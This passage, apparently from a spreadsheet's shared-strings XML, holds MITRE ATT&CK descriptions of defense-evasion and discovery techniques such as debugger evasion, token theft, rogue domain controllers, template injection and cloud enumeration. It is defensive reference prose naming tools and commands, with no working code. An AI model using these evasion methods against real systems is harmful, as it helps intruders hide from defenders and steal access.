One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)
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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote &lt;code&gt;build&lt;/code&gt; request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that &lt;code&gt;build&lt;/code&gt; API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </t>
  </si>
  <si>
    <t>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various means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
Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
</t>
  </si>
  <si>
    <t>Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as &lt;code&gt;IsDebuggerPresent()&lt;/code&gt; and &lt;code&gt; NtQueryInformationProcess()&lt;/code&gt;, or manually checking the &lt;code&gt;BeingDebugged&lt;/code&gt; flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as &lt;code&gt;OutputDebugStringW()&lt;/code&gt;.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. 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There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. </t>
  </si>
  <si>
    <t>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.</t>
  </si>
  <si>
    <t>Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.
With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.</t>
  </si>
  <si>
    <t>Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.
Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.
An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t xml:space="preserve">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Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) </t>
  </si>
  <si>
    <t>Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open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rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the &lt;code&gt;*\template&lt;/code&gt; control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.</t>
  </si>
  <si>
    <t>Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. 
In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).
Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.   
Impersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)
There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)</t>
  </si>
  <si>
    <t xml:space="preserve">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abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) </t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.</t>
  </si>
  <si>
    <t>An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</t>
  </si>
  <si>
    <t>Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)
Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)</t>
  </si>
  <si>
    <t>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maintain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[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.</t>
  </si>
  <si>
    <t>Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.</t>
  </si>
  <si>
    <t>Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a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Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.
There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)</t>
  </si>
  <si>
    <t>Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the &lt;code&gt;info.plist&lt;/code&gt; file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) 
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the &lt;code&gt;LSUIElement&lt;/code&gt; key in an application’s &lt;code&gt;info.plist&lt;/code&gt; file  to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as &lt;code&gt;LSEnvironment&lt;/code&gt;, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)</t>
  </si>
  <si>
    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).</t>
  </si>
  <si>
    <t>Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</t>
  </si>
  <si>
    <t>Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.
For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses,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
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. &lt;code&gt;show ip route&lt;/code&gt;, &lt;code&gt;show ip interface&lt;/code&gt;).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. </t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network.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On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. &lt;code&gt;show ip sockets&lt;/code&gt;, &lt;code&gt;show tcp brief&lt;/code&gt;).(Citation: US-CERT-TA18-106A)</t>
  </si>
  <si>
    <t>Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as &lt;code&gt;sc query&lt;/code&gt;, &lt;code&gt;tasklist /svc&lt;/code&gt;, &lt;code&gt;systemctl --type=service&lt;/code&gt;, and &lt;code&gt;net start&lt;/code&gt;.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.</t>
  </si>
  <si>
    <t>An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request, the &lt;code&gt;HeadBucket&lt;/code&gt; API to determine a bucket’s existence along with access permissions of the request sender, or the &lt;code&gt;GetPublicAccessBlock&lt;/code&gt; API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
